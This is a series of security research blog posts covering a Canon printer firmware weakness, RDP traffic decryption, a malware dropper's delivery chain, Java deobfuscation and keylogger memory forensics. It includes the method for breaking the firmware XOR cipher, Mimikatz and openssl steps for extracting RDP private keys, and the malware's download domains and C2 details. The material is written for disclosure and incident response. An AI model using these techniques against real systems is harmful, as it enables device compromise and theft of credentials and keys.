This interface does not require user authentication allowing anyone to connect to the interface.  At first glance the functionality seems to be relatively benign, you could print out hundreds of test pages and use up all the ink and paper, so what?  The issue is with the firmware update process.  While you can trigger a firmware update you can also change the web proxy settings and the DNS server.  If you can change these then you can redirect where the printer goes to check for a new firmware.  So what protection does Canon use to prevent a malicious person from providing a malicious firmware?  In a nutshell - nothing, there is no signing (the correct way to do it) but it does have very weak encryption. I will go into the nuts and bolts of how I broke that later in this blog post.  So we can therefore create our own custom firmware and update anyone’s printer with a Trojan image which spies on the documents being printed or is used as a gateway into their network.  For demonstration purposes I decided to get Doom running on the printer (Doom as in the classic 90s computer game).  It was not straight forward due to it needing all the operating system dependences to be implemented in Arm without access to a debugger, or even multiplication or division. But that's a blog for another day. Here’s the video (sorry the colours aren't perfect):


But would anyone put their printer’s web interface on the Internet? Well we sampled 9000 of the 32000 IPs that Shodan (http://www.shodanhq.com) indicated may have a vulnerable printer. 1822 of those IPs responded and 122 we believe have a vulnerable firmware version (around 6%). We therefore estimate there are at least 2000 vulnerable models connected directly to the internet.

Even if the printer is not directly accessible from the Internet, for example behind a NAT on a user’s home network or on an office intranet, the printer is still vulnerable to remote attack. The lack of authentication makes it vulnerable to a cross-site request forgery attacks (CSRF) that modify the printer’s configuration. A colleague (thanks Paul Stone) demonstrated this by making a web page that first scans the local network for vulnerable printers (using a technique called JavaScript port scanning). Once the printer’s IP address has been found, the web page sends a request to the web interface to modify the proxy configuration and trigger a firmware update. Although the printer is not actually on the Internet, this is possible because the malicious web page initiates requests from the user’s browser which is on the same network as the printer.

Context contacted Canon back in March of this year and we provided them with the information about this issue.  They have informed us that future versions of the printer will have username and password authentication on the web interface.  See at the end of the blog for their full response.

This blog post contains a description of how the encryption was broken.  I will follow this blog up with a description of how I went from the ability to modify the firmware, to actually running custom code which could use the wireless network stack, manipulate the memory and update the screen as shown in the video.  The firmware does not run an operating system but is a single lump of compressed ARM code which makes for an interesting reverse engineering challenge, particularly with no debugger or console and when it takes 10 minutes to update the printer, which we don’t want to brick.

How the encryption was broken

In this section of the blog I will go into the nerdy details of how the encryption was broken.

Let’s start by looking at the encrypted firmware, it looks like this:


Figure 2 - Encrypted Firmware

You can see repeating patterns (one pattern highlighted above) in the encrypted firmware meaning that the encryption is not industry best practice.  The repeating pattern gives us a clue as to the length of the key.  In this case the pattern is 0x30 long; therefore the key is either 0x30 or a factor of it.  Also by looking at the character frequency it is clear that this is not good crypto:


Figure 3 - Character Frequency Analysis of Encrypted firmware (vertical axis is frequency, horizontal byte 0-0xff)

If we assume that the encryption algorithm is at least based on a XORing of a key with the plain text, then what we have is a basic XOR encryption:


Figure 4 - Basic XOR Encryption

If this is the case then the blocks are as follows:

P0 ^ K = C0
P1 ^ K = C1
Pn ^ K = Cn

While we don’t know what the key is, what we can do is remove the key from the encrypted data by XORing the first line of the data with the rest of the data.  Therefore:

P0 ^ K ^ C0 = 0
P1 ^ K ^ C0 = P1 ^ P0
Pn ^ K ^ C0 = Pn ^ P0

This means that the first block is zero and the rest of the blocks are its original plain text XORed with the plain text of the first block, hence no key.  If we can work out the plain text of the first block then we will get the full decryption.  If we look at the results we get his:


Figure 5 - Encrypted firmware with first block XORed with the rest

The graph looks neater but the resulting text is still gibberish.  What we need to do is to work out what the first block of data is and then we can use that to return the original data.  After a lot of playing around with different options, I found that older firmwares for Canon printers did not have this ‘encryption’ and use the SRecord format (http://en.wikipedia.org/wiki/SREC_%28file_format%29).  This is a format that is commonly used for writing to the memory of embedded devices.  The format that the file takes is ASCII for example:


Figure 6 - SRecord example (source Wikipedia)

The format only uses ASCII hex digits, newlines and the ‘S’ at the start of each line.  This provides a very useful crib into what will be at the start of the Canon’s firmware (I assuming they are using SRecords).  The first character must be an ‘S’ followed by a series of ASCII hex numbers.  So if we make a guess at what the first line might be, for example:

S00000000000000000000000000000000000000000000000

And see the resulting decryption:


Figure 7 - First attempt at decryption

The shape of the graph fits in roughly with ASCII text (values being mainly between 0x30-0x7f) and we can see that the first column (highlighted in green) only contains ASCII values which is confirmation that we have the first byte correct for the SRecord format.  However the second column has characters which are not valid for the file format (highlighted in blue) and therefore the second character of the plain text is not a zero.  The third column (in orange) has a correct value as all the characters are valid; including the 0xd line feed character.  We can automate the brute forcing of the characters at this point because we know the subset of possible characters and then can validate the column to ensure that no invalid characters are decrypted.  After this process we find that the key length is actually 0x10 and we have a valid SRecord, SRecords have checksums which helps us ensure we have the valid key, the file looks like this:


Figure 8 - Plain text firmware

There is no other protection in the firmware file.  SRecords have a checksum on each line but there is no signing of the firmware and therefore because we can decrypt the firmware we can modify the SRecords and then re-encrypt the file and update the printer with our own custom firmware.

Vendor Response Timeline
  • 14th March 2014 – Canon notified of the issue.
  • 18th March 2014 – Canon request further information.
  • 19th May 2014 – Canon escalated the issue.
  • 29th May 2014 – Request permission to publish this blog post.
  • 5th June 2014 – Canon acknowledges the issue.
  • 9th June 2014 – Canon visit Context to discuss this release.
  • 12th Sept 2014 – Blog release in conjunction with a presentation at 44Con.

Canon provided the following statement regarding this issue:

“We thank Context for bringing this issue to our attention; we take any potential security vulnerability very seriously.  At Canon we work hard at securing all of our products, however with diverse and ever-changing security threats we welcome input from others to ensure our customers are as well protected as possible.

We intend to provide a fix as quickly as is feasible.  All PIXMA products launching from now onwards will have a username/password added to the PIXMA web interface, and models launched from the second half of 2013 onwards will also receive this update, models launched prior to this time are unaffected. This action will resolve the issue uncovered by Context.”  

Recommendations

Context recommends that you do not put your wireless printers on the Internet, or any other ‘Internet of Things’ device.  To defend against the CRSF attack, well don’t follow any dodgy links is the best advice I can come up with.  Context is not aware of anyone in the wild actively using this type of attack, but hopefully we can increase the security of these types of devices before the bad guys start to. Finally, make sure that you always apply the latest available firmware to your devices. This is often not an automatic process and may require checking on the manufacturer’s website for updates.

RDP Replay

$
0
0
Here at Context we work hard to keep our clients safe. During routine client monitoring our analysts noticed some suspicious RDP traffic. It was suspicious for two reasons. Firstly the client was not in the habit of using RDP, and secondly it had a Chinese keyboard layout. This information is available in the ClientData handshake message of non-SSL traffic, and can easily be seen in wireshark.


Notice that the keyboard layout is 2052. This, for our client, is bad. I’ve also blanked out the client name, as this information is leaked by the attackers.

I was asked what I could get out of this pcap file. Well, as it turns out, quite a lot!

1 Crypt

The first thing to note is that, after the initial (lengthy) handshake, all messages are encrypted. Most people will just give up at this point. Not me. I’m stubborn. I know wireshark can decrypt (most) SSL crypt as long as you have the private key. Surely you can do the same with standard RDP encryption? If so, where do I get the private key? How do I get the private key? What do I do with it if I get one?

2 First Steps

I got hold of the source code for a Linux RDP client (rdesktop), and found where the crypt exchange takes place. These are all about securely exchanging a shared session key. Hacking the client with a simple “printf” gave me the session key for a single pcap session. So I have the key, what can I do with it? Some experimentation with the decryption routines in rdesktop gave me decrypted data. Surely all I need to do is feed this data into rdesktop in the correct place to get the display rendered. Easy, right? So, what next?

3 Processing the Data

The protocol stack is shown here.

Notice that the stack may or may not have SSL depending on negotiated capabilities but the RDP and Fast Mode headers and details will be different between the two modes, as this is where the encryption takes place for non-SSL data. If you want detail on the various layers, they are all standard and RFC based, and wireshark does a good job of displaying them. How do I process them? I’m a Unix guy, so this is all done in Linux (Ubuntu to be more specific). I’ll explain my processing a layer at a time.

3.1 Pcap Replay

I had to write software to read a pcap file and play it back in real time (or other specified speed). This was fairly simple to achieve. Playing at full speed is fun, but not very useful.

3.2 Ethernet

I simply skip over this, after checking that the payload is IP4 (type 0x0800).

3.3 TCP/IP

Processing IP4 was not so straight forward, as I had to deal with fragmentation as well as checksum verification. This has to live closely with TCP to make sure we have correct TCP/IP footprint for the data to be processed. I needed to re-order packets, drop duplicate data, and perform checksum verification for TCP. By default it will “lock on” to the first TCP SYN packet. You can specify a port if your pcap contains more than one TCP stream.

3.4 TPKT / X.224 / T.125

I perform minimal processing of the these layers, just making sure that I’m parsing and checking lengths and discarding non payload frames. Setup and negotiation information is of no interest to us. Well, mostly. Some of it is of use, for example the MCS channel negotiation will tell us where to find the clipboard channel. Apart from a few similar details, all I need at this point is the RDP payload data.

3.5 RDP

Microsoft have a very good reference for the RDP protocol

http://msdn.microsoft.com/en-us/library/cc240445.aspx

This was invaluable for getting higher versions of RDP working. I will not go into details here. Feel free to browse the reference material (it will help you sleep). I will explain this processing later.

4 Crypt (Again)

I need to get hold of the session key for each session I want to decrypt/display. The only way to do this is with the private key, as session keys are exchanged with public crypt. I’m by no means an expert on these things, but basic public key crypt goes something like this.


This is a little over simplified, but the basics are there. It shows that we can recover the session key with the encrypted session key (that we see in the traffic) and the private key from the server. But how do we get that?

This turned out not to be a showstopper as we have access (via our customer) to the server and can extract the private key needed to decrypt the traffic. But how? Where are the keys held, and how do I get to them?

4.1 Accessing your Privates

There are 2 real variants of encryption used by RDP. The original RDP encryption, using RC4, and SSL. SSL will be used by preference, but older servers and/or clients may not support this, and fall back to the older encryption method. I will cover extraction of SSL keys in a moment. I will explain the older style private key handling first.

4.2 RC4 Key Extraction

Originally there was only one RDP private key (pre Vista) and it was stored in the LSA (Local Security Authority) under a key named

  • L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75

Passcape have a tool for extracting this, as long as you have Admin privileges, and here we can see an example output.


The private key here is c18f99e6……33bd (from 0x110 to 0x14f)

Vista onwards changed the way keys were handled with the introduction of DPAPI (Data Protection API). The length of the private key increased from 512 bits to 2048 bits. The shorter key is still available under the name

  • L$HYDRAENCKEY_52d1ad03-4565-44f3-8bfd-bbb0591f4b9d

The tool from Passcape will not work with the DPAPI, so we wrote our own. To access the DPAPI you need to run as System, so we use PsExec (a SysInternals tool) for this. Here’s an example (on Windows 7) 


4.3 SSL Key Extraction

To extract the private key for SSL you will need to use Mimikatz. When I added support for SSL, I used the latest version (from May 2013). I looked at the latest version when putting together this report (October 2014), and did not have much joy with it. It’s probably the way I’m driving the software, but didn’t spend much time on trying to get it to work. Here you will see an example using this older version of Mimikatz on a Windows 7 box. Again, you will need to run this as the System user.
 
Once you have extracted the PFX file, you can use openssl to get the private key:

  • openssl pkcs12 –in infile.pfx –nodes –out outfile.pem

When prompted, the password is: mimikatz

4.4 Decryption

I now know how to get private keys, so I can (in theory) recover session keys. I have all the puzzle pieces, so just need to write something.

I have already explained the processing up to the encryption and RDP layers, so it’s time to tackle the decryption.

Armed with the private key for old style RDP, this is not too bad a job. I have to perform custom initialisation of the crypto variables, and use both sets for the decryption, but mostly this taken from freely available software.

SSL was a different matter. I’m using OpenSSL, and there is no support for feeding in data that is not associated with a socket. It does not play nicely.  Controlling the initialisation of the crypt variables also took quite a bit of head scratching, and I was relieved to get this part working. Not fun.

5 The RDP layer

RDP is really a rich set of capabilities, and clients negotiate with servers to agree a compatible set to use. We have no control over this, so need to be able to process what was on the wire.

It quickly became apparent that the capabilities supported in rdesktop were not very extensive. Rather than implementing a large amount of functionallity, I looked elsewhere. I found something better suited to my needs with FreeRDP, another open source implementation of RDP.

The APIs available in FreeRDP were not designed for the use (or abuse) that I had planned. I had to chop out and discard most of the functionality it provided. I did re-use the RDP crypt processing, but mostly needed the bitmap/pixmap parsing, caching and processing, and the rendering engine. I also needed to add some functionality (e.g. Bulk compression support was added, as this was used in some of the data we had) and fix the odd bug. I had to make the library more robust, as I was feeding in wild and unexpected data that was not always in the correct state to process, and so needed to guard against NULL pointers and suchlike. This was a long an iterative process, and will probably continue as and when clients need the use of this capability.

This is by no means a full implementation of RDP. Support has only been added for the parts of the protocol specification I needed to process. Large the parts of the specification are already supported by FreeRDP. Together this covers a large proportion of the specification, but mileage may vary.

5.1 Other Considerations

I mainly focused on data from the server to the client, as this has all the rendering information. Data in the reverse direction has mouse movement and key-press information. This allows me to extract all keys pressed, including hidden (password) text, and track the mouse cursor. This was useful (well, the analysts demanded it), so I added support for this.

The analysts also wanted to watch the output as a video, so I also added support to output directly to a video file (using V4L).

We (again, I mean the analysts) saw that the clipboard was used to transfer data to and from the target machine, so all clipboard selections can be optionally output to disk.

6 Example

Enough talk, let’s see a run of the program. Here I am extracting the RDP keys I need to process the pcap I’m capturing while doing it! You also see the command line and the key press information.  

7 Results

Information gained from viewing the intrusion was invaluable. Details of tradecraft and operational tools showed just how mature the intrusion was. We were also able to get these tools for further analysis (they were normally cleaned up after use). It helped to identify ORBs and compromised machines, and guided the remediation planning. It is also high impact in the board room. Telling the customer they have an intrusion is one thing. Showing them a video of the actors on their network is another thing entirely.


Evasive Measures: "faxmessage.php" malware delivery

$
0
0
In the ongoing malware arms race attackers are always trying to find creative ways to bypass detection, and this isn’t something that is limited to targeted threat actors. In fact some ingenious evasion techniques seen by Context are the handiwork of more commonplace cyber-criminals looking to spread their malicious code as widely as possible.

A good example of this was observed recently, and consisted of a method that was designed to trick users into downloading zip files containing malicious executables, while also providing the means to evade network defences.

This activity began with a tried and tested methodology that is likely familiar to many cyber security analysts: a malicious link contained within a phishing email, although in this instance the activity came to our attention due to the traffic we saw across the network, rather than from analysis of the phishing email itself. The image below gives an example of this suspicious initial request:


In this example the user clicked on the link and a subsequent request for the resource ‘faxmessage.php’ was sent to an attacker controlled domain, which in this instance was ‘novastore-print(dot)com’. Interestingly the victim’s user-agent information was also contained within the body of the request, likely for profiling purposes.

But here’s where things get interesting…

A response containing the resource was returned but there was something odd about the content. The response from the web server contained very little actual HTML, but it did include an iframe with a zip file base64-encoded and embedded within the page itself.


From the perspective of the user, they were presented with a simple webpage containing the text “Please read the document” along with a download dialog box pointing to the malicious zip file embedded within the page.

The HTTP standard, RFC 1945, states that “any HTTP/1.0 message containing an entity body should include a Content-Type header field defining the media type of that body”. Helpfully the attackers have complied with this as they have stated the data is “text/html” content, which is perfectly valid, but as we know this is not the whole story given the lurking zip file.

This highlights one of the problems of relying on standards definitions in network monitoring, as just monitoring the network for responses containing “Content-Type: application/zip” will not find the suspicious file as it is embedded in the body of the response, which is more-or-less legitimately marked as “text/html” content.


At this point fortunately our user did not proceed any further, but having caught our attention we had a quick closer look. After saving the PHP file and carving out the base64-encoded data, we used a simple bit of "bash-fu" to dump out the content and reveal its true nature…

'base64 --decode < carved_b64.txt > doc21641_pdf.mal’


A quick bit of open source research confirms that this is a malicious file. After running this sample across VirusTotal, it seems MalwareBytes have previously identified this executable masquerading as a PDF:


All of the variants of this first stage dropper that we’ve seen have attempted to connect to domains resolving to a wide range of IP addresses, indicating that the attackers have a large infrastructure at their disposal. The communications all resemble the following format:

GET /0112UK2/ADB7CB0C47E1463/0/51-SP3/0/ HTTP /1.1

The first stage malware acts as a dropper for a second stage crimeware implant. Once run, doc21641_pdf.exe will create or 'drop' another file, “fwygl.exe”, before launching it. The dropped file was constant across the various samples analysed and was created in the following location:

 C:\Documents and settings\<USER>\Local settings\temp\fwygl.exe

The executable doc21641_pdf.exe then deletes itself. It does however leave forensic traces such as a Prefetch file in the Windows directory and Shim Cache entry in the registry. The dropped malware fwygl.exe then requests “/images/t2.pnj” from the domain “www.wholesale-motoroilonline[dot]com” which, at the time of analysis, resolved to the IP address 192.163.217.66.

Alternatively, if the dropper cannot connect to this address it attempts to download the same resource from “wholesalesyntheticmotoroil[dot].com”. Both of those domains and the resource string were found within the malware binary and within the subsequent network traffic.

If the dropper successfully connects to either of the destination domains above, the second stage implant is downloaded installed to C:\WINDOWS\ and given pseudo randomly generated name. Although this file is not currently identified as malicious on VirusTotal, it results in further malware which is detected as crimeware:


Once installed, the second stage will connect to the domain "icanhazip[dot]com" followed by the IP addresses below:

176.114.0[.]48

181.41.203[.]237

181.41.203[.]237

The network communication can be seen in the following FakeNet output:


An additional SSL connection was also seen attempting to connect to the IP address 212.56.214.130, using an autonomous system in Moldova which is associated with the Dyre botnet:


To conclude, in this example we see this method being used to serve crimeware, but this technique could easily be modified to download any file type in such a way that it would not be presented within web logs or obvious in network traffic. This simple technique will certainly evade some Intrusion Detection Systems that are monitoring for the download of a specific file type based on HTTP header information.

Without measures to specifically detect this activity, network forensics tools would most likely classify the file as HTML, based on the initial request for the PHP file, potentially allowing suspicious content through without adequate screening.

Automating Removal of Java Obfuscation

$
0
0

In this post we detail a method to improve analysis of Java code for a particular obfuscator, we document the process that was followed and demonstrate the results of automating our method. Obscurity will not stop an attacker and once the method is known, methodology can be developed to automate the process.

Introduction

Obfuscation is the process of hiding application logic during compilation so that the logic of an application is difficult to follow. The reason for obfuscation is usually a result of vendors attempting to protect intellectual property, but serves a dual purpose in slowing down vulnerability discovery.

Obfuscation comes in many shapes and forms, in this post we focus on a particular subset: strings obfuscation; more specifically, encrypted string constants. Strings within an application are very useful for understanding logic, for example logging strings and exception handling is an excellent window into how an application handles certain state and can greatly speed up efforts to understand functionality.

For more information on what obfuscation is within the context of Java, see [0].

Note that the following entry assumes the reader has a rudimentary understanding of programming.

Decompilation

Firstly, we extract and load the Java archive (jar) using the tool JD-GUI [1] (a Windows based GUI tool that decompiles Java “.class” files), this is done by drag-dropping the target jar into the GUI window. The following is what is shown after scrolling down to an interesting looking class:

 
Figure 1 - JD-GUI showing the output from the disassembly

The first observation we can make is that JD-GUI has not successfully disassembled the class file entirely. The obfuscator has performed some intentional modifications to the bytecode which has hampered disassembly.

If we follow the sequence of events in the first z function we can see that it does not flow correctly, incorrect variables are used where they shouldn’t be, and a non-existing variable is returned. The second z function also seems very fishy; the last line is somehow indexing into an integer, which is definitely not allowed in Java. Screenshot shown below.


Figure 2 - Showing the suspicious second 'z' function


Abandoning JD-GUI and picking up trusty JAD [2] (a command line Java .class decompiler) yields better results, but still not perfect:


Figure 3 - Showing the output that JAD generates

We can see that disassembly has failed as JAD inserts the JVM instructions (as opposed to high level Java source); in fact JAD tells us as such in the command line output. Fortunately it appears that the decoding failures only exist in a consistent but limited set of functions and not the entire class. Secondly, we can see that the strings are not immediately readable; it is quite obvious that there is some encryption in use. The decryption routine appears to be the function z, as it is called with the encrypted string as the input.

As shown in Figure 2 there are two functions sharing the name (z), this is allowed in Object Oriented languages (Function Overloading [3]) and it is common for obfuscators to exploit such functionality. It is however possible to determine the true order of the called functions by looking at the types or the count of the parameters. Since our first call to z provides string as the parameter, we can derive the true order and better understand its functionality.

We can see in Figure 4 (below) that the first z converts the input string ‘s’ to a character array: if the length of the array is 1 it performs a bitwise XOR with 0x4D, otherwise it returns the char array as-is. JAD was unable to correctly disassemble the function, but in this case such a simple function is easy to analyse.


Figure 4 - Showing the first 'z' function

The second z function (seen in Figure 5 below) appears to be where the actual decryption is done.


Figure 5 - Second 'z' function, highlighting the interesting integer values

To know what happens with the input we must understand that Java is a stack based language. Operations are placed on the stack and operated upon when unrolled.

The first important instruction we see is that the variable i is set to 0; we then see the instruction caload, which loads a character from an array at a given index. While JAD has not successfully decompiled it, we can see that the index is the variable i and the array is the input character array ac (and in fact, ac pushed onto the stack at the very start of our function). Next, there is a switch statement, which determines the value of byte0.

After the switch statement, byte0 is pushed onto the stack. For the first iteration, its value will be value 0x51. The proceeding operations perform a bitwise XOR between the byte0 value and the character in ac at index i, Then i is incremented and compared with the length of ac, if the index is greater than the length of ac, the ac array is converted to a string and returned, if the index is less thank the length of ac the code jumps back to L3 and performs another iteration on the next index.

In summary, this z function takes the input and loops over it, taking the current index within the input and performing a bitwise XOR against a key that changes depending on the current index. We also note that there is a modulus 5 function involved against the current index, indicating that there are 5 possible keys (shown in red in Figure 5).

To neaten this up, we will convert the second z to pseudocode:

        keys = [81,54,2,113,77]
        // below input is "#Sq\0368#Ug\002b\"Oq\005(<\030r\003\"!Sp\005$4E" 
        input = [
          0x23, 0x53, 0x71, 0x1e, 0x38, 0x23, 0x55, 0x67, 
          0x02, 0x62, 0x22, 0x4f, 0x71, 0x05, 0x28, 0x3c, 
          0x18, 0x72, 0x03, 0x22, 0x21, 0x53, 0x70, 0x05, 
          0x24, 0x34, 0x45
        ]

        for i in 0..input.length-1 do
            printf "%c" (keys[i%keys.length] ^ input[i])
       

As you can see from the above code, it converts to a simple loop that performs the bitwise XOR operation on each character within the input string; we have replaced the switch with an index into the keys array.

The code results in the string "resources/system.properties" being printed - not at all an interesting string - but we have achieved decryption.

Problem analysis

With knowledge of the key and an understanding of the encryption algorithm used, we should now be able to extract all the strings from the class file and decrypt them. Unfortunately this approach fails; this is a result of each class file within the Java archive using a different XOR key. To decrypt the strings en-masse, a different approach is required.

Ideally, we should programmatically extract the key from every class file, and use the extracted key to decrypt the strings within that file. One approach could be to perform the disassembly using JAD, and then write a script to extract out the switch table – which holds the XOR key - and the strings using regexes.

This would be reasonably simple but error prone and regex just does not seem like an elegant solution. An alternative approach is to write our own Java decompiler which gives us a nice abstracted way of performing program analysis. With a larger time investment, this is certainly a more elegant solution.

To perform this task, we chose the second option. As it turns out, the JVM instruction set is quite simple to parse and is well documented [4, 5, and 6], so the process of writing the disassembler was not difficult.

Parsing the class file - overview

First we parse the class file format, extracting the constants pool, fields, interfaces, classes and methods. We then disassemble the methods body (mapping instructions to a set of opcodes), the resulting disassembly looks like the below (snippet):


Figure 6 - Showing the byte to opcode translation, each section is divided into a grouping (e.g. Constants,Loads,Maths,Stack) an operation (e.g. bipush) and an optional argument (instruction dependent, such as ‘77’).

As you can see, the above shows the tagged data that resulted from parsing the JVM bytecode into a list of opcodes with their associated data.

Extracting encryption function

We are after the switch section of the disassembled code, as this contains the XOR key that we will use to decrypt the ciphertext. We can see based on the documentation that it maps back to the instruction tableswitch [7], which is implemented as a jump table, as one would expect.

Now it is a matter of mapping over the opcodes to locate the tableswitch instruction. Below is the section of the opcode list we are interested in:


As you can see, the tableswitch instruction contains arguments: the first argument is the default case (67), and the second argument is the jump table, which maps a 'case' to a jump. In this example, case 0 maps to the jump 48. The last argument (not in screenshot) is the padding which we discard.

Our algorithm for extracting this table is as follows:

  1. Detect if a control section contains a tableswitch.
  2. Extract the tableswitch.
  3. Extract the jumps from the tableswitch.
  4. Build a new jump table containing the original jump table with the default jump case appended on the end.
  5. We now have all the jumps to the keys.
  6. Map over the method body and resolve the jumps to values.
  7. We now have all the key values and the XOR function name.

 
Figure 7 – Code(F#) Showing the pattern matching function which implements the algorithm to extract switch tables.

 
Figure 8 - Showing the resulting extracted XOR keys from the switch tableThe next step is to locate the section of the class where the strings are held. In the case of this obfuscator, we have determined through multiple decompilations that the encrypted strings are stored within the static initialization section [8], which JAD generally does not handle effectively. At runtime, when the class is initialised, the strings are decrypted and the resulting plaintext is assigned to the respective variable.

Extracting the static initialization section is trivial, we map over the code body and find sections where the name is `<clinit>' [9] and the descriptor is `()V' which denotes a method with no parameters that returns void [10].

Once we have extracted this, we resolve the 'private static' values making sure to only select the values where our decryption function is being called (we know the name of the function as we saved it). It is now just a process of resolving the strings within the constants pool.

At this stage we have:

  1. Extracted the decryption key;
  2. The actual decryption algorithm implemented (XOR); and
  3. Encrypted strings.

We can now decrypt the strings and replace the respective constant pool entry with the plaintext. Since the decryption uses a basic bitwise XOR, the plaintext length is equal to the ciphertext length, which means we don't have to worry about truncation or accidentally overwriting non relevant parts of the constant pool. Later we plan to update the variable names throughout the classes and remove the decryption functions.


Figure 9 - Example decryption, plaintext bytes, cipher bytes, and plaintext result.

The particular class file we chose to look at, turned out to not have any interesting strings, but we are now able to see exactly what it does. The next stage is to loop over all class files and decrypt all the strings, then analyse the results so that we can hopefully find vulnerabilities, which is a story for another day.

Conclusion

In conclusion, we have shown that by investing time into our reversing, we are able to have higher confidence of the functionality of the target application, and by automating the recovery of obfuscated code, we have shown that obfuscation alone is not an adequate protection mechanism, but it does slow an attacker down.

In addition to the automated recovery, we now have a skeleton Java decompiler, which will eventually be lifted into our static analysis tool.

Finally, we have shown that if you try hard enough, everything becomes a fun programming challenge.

 

[0] http://www.excelsior-usa.com/articles/java-obfuscators.html

[1] http://jd.benow.ca/

[2] http://varaneckas.com/jad

[3] http://en.wikipedia.org/wiki/Function_overloading

[4] https://github.com/Storyyeller/Krakatau

[5] https://docs.oracle.com/javase/specs/jvms/se8/html/jvms-4.html

[6] http://docs.oracle.com/javase/specs/jvms/se8/html/jvms-6.html

[7] http://docs.oracle.com/javase/specs/jvms/se7/html/jvms-6.html#jvms-6.5.tableswitch

[8] http://docs.oracle.com/javase/tutorial/java/javaOO/initial.html

[9] http://stackoverflow.com/questions/8517121/java-vmspec-what-is-difference-between-init-and-clinit

[10] http://stackoverflow.com/questions/14721852/difference-between-byte-code-initv-vs-initzv

Thanks for the Memories: Identifying Malware from a Memory Capture

$
0
0

We've all seen attackers try and disguise their running malware as something legitimate. They might use a file name of a legitimate Windows file or even inject code into a legitimate process that's already running. Regardless of how it's done, that code has to run, which means it has to be in memory. Somewhere.

In this blog post we lay out a real-life examination of computer memory which enabled us to identify a keylogger that was running, what files were responsible for running it, and how it managed to ensure it was started every time the machine booted up. Not only did this provide us with previously unknown indicators of compromise, but also specific details with which we could assist the client in their remediation efforts.

Background

During some hard disk forensics, one of our examiners found a text file which was clearly a log of a keylogger application. I won't share the gory details of what it contained - I'm sure you can imagine. By performing a search for the file name, the examiner found a hit in C:\Windows\MEMORY.DMP. This file stores debug information when a system failure occurs. The examiner passed this one over to me to see if I could do anything to help identify the keylogger.

I've anonymised the username for the purposes of this blog, replacing the username of the currently logged in user with 'theuser', but the file we're interested in is:

C:\Users\theuser\AppData\Local\Temp\theuser_tmp.dat

As is probably obvious, the file name is made up of logged-in-user-name + _tmp.dat.

In this case, as is the default, Windows had created a 'Kernel Memory Dump'. That is, not a full memory dump, but enough to help troubleshoot system failures. Unfortunately, at least to the best of my knowledge, there's not too much that can be done with a Kernel Memory Dump. However, that didn't deter us. The hard disk also contained a hiberfil.sys, which is the file that Windows uses when it goes into hibernation; it essentially contains a copy of RAM at the time the machine enters the hibernation state.

Enter Volatility

There are a few memory forensics tools out there, but the one I've seen prove itself time and time again is Volatility from the Volatility Foundation. Volatility is written in python, is free and is open source.

Armed with the latest version of Volatility (2.4, at the time of writing), I set about examining the hiberfil.sys. The first hurdle was compression - hiberfil.sys files are compressed, so Volatility has to decompress the file on the fly in order to analyse it. This is slow. Luckily, Volatility provides the imagecopy plugin which allows us to convert one type of memory dump (e.g. hiberfil) into a raw, uncompressed format - much faster.

C:\>python vol.py -f hiberfil.sys --profile=Win7SP1x64 imagecopy -O hiberfil.dd

Is the file into which the keystrokes are being logged actually referenced in memory?

With an uncompressed image, and contemporaneous notes underway, a good starting point was to see if the file was open in memory. For that, we use filescan:

C:\>python vol.py -f hiberfil.dd --profile=Win7SP1x64 filescan

And in the output, we look for our file:

Offset(P)  Pointers Handles Access Name
---------- -------- ------- ------ ----
--SNIP--
0x1b66ef20 16       0       -W--w- \Device\HarddiskVolume1\Users\theuser\AppData\Local\Temp\theuser_tmp.dat
--SNIP--

This is good news. The file was indeed open, for write access, when the memory dump was taken. At least we know we're not wasting our time.

Which processes are accessing the file?

The next step was to see which processes were accessing the file. A useful blog post from Andreas Schuster says that Volatility should be able to resolve the process(es) by following the _FILE_OBJECT structure. However, the blog post relates to quite an old version of Volatility and it doesn't seem to apply to the current version. Or it might be that it only works with handles, which in this case we didn't have. Regardless, there's always something else to try.

By using strings from Sysinternals we can find the positions (offsets) within the raw memory dump where the paths can be seen, and save them to a file:

C:\>strings -o -n 9 hiberfil.dd | findstr /I /L "\theuser_tmp.dat" >strings.txt

And the output, in strings.txt, looks something like this:

--SNIP--
785366187:\Device\HarddiskVolume1\Users\theuser\AppData\Local\Temp\theuser_tmp.dat
795296032:\Device\HarddiskVolume1\Users\theuser\AppData\Local\Temp\theuser_tmp.dat
821237504:C:\Users\theuser\AppData\Local\Temp\theuser_tmp.dat
829851904:C:\Users\theuser\AppData\Local\Temp\theuser_tmp.dat
--SNIP--

We can then use this strings file as an input to Volatility's strings plugin. The strings plugin takes a text file where each line contains a decimal offset and string to find, for example: 123456:some_text, and returns the process ID and virtual address where the string is found.

So:

C:\>python vol.py -f hiberfil.dd --profile=Win7SP1x64 strings -s strings.txt >strings-output.txt

Gives us the following in strings-output.txt:

--SNIP--
1125860523 [2000:008d74ab] \Device\HarddiskVolume1\Users\theuser\AppData\Local\Temp\theuser_tmp.dat
1160780915 [4628:1051ec73] c:\users\theuser\appdata\local\temp\theuser_tmp.dat
1167748112 [kernel:fa8001c4ec10] heuser\AppData\Local\Temp\theuser_tmp.dat:6E53BFF5-0001-412B-8407-E3AEDE763511:$DATA
1336598656 [kernel:f8a007b1b080] \Users\theuser\AppData\Local\Temp\theuser_tmp.dat
1542979888 [4628:0322d130] C:\Users\theuser\AppData\Local\Temp\theuser_tmp.dat
1575054952 [3056:025c3e68] \Device\HarddiskVolume1\Users\theuser\AppData\Local\Temp\theuser_tmp.dat
--SNIP--

By working through the file, a unique list of processes accessing the strings can be drawn up:

  • kernel
  • 2000
  • 3056
  • 4628

The process IDs can be easily found by running the pslist plugin and checking the PID value:

C:\>python vol.py -f hiberfil.dd --profile=Win7SP1x64 pslist

The output gives us:

Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------
0xfffffa8001719b30 System                    4      0    146     2056 ------      0 2014-09-15 07:35:03 UTC+0000
0xfffffa800305d040 smss.exe                320      4      2       33 ------      0 2014-09-15 07:35:03 UTC+0000
0xfffffa8004eeeb30 csrss.exe               456    448     10     1052      0      0 2014-09-15 07:35:10 UTC+0000
--SNIP--
0xfffffa800639cb30 Rtvscan.exe            3056    612     24      531      0      1 2014-09-15 07:35:34 UTC+0000
--SNIP--
0xfffffa8002d63490 ccSvcHst.exe           2000    612     36      408      0      1 2014-09-15 07:35:28 UTC+0000
--SNIP--
0xfffffa80032a0b30 svchost.exe            2816    612     4       102      0      0 2014-09-15 07:35:33 UTC+0000
--SNIP--
0xfffffa8003a766f0 explorer.exe           4628   4460     46     1118      1      0 2014-09-15 07:36:12 UTC+0000
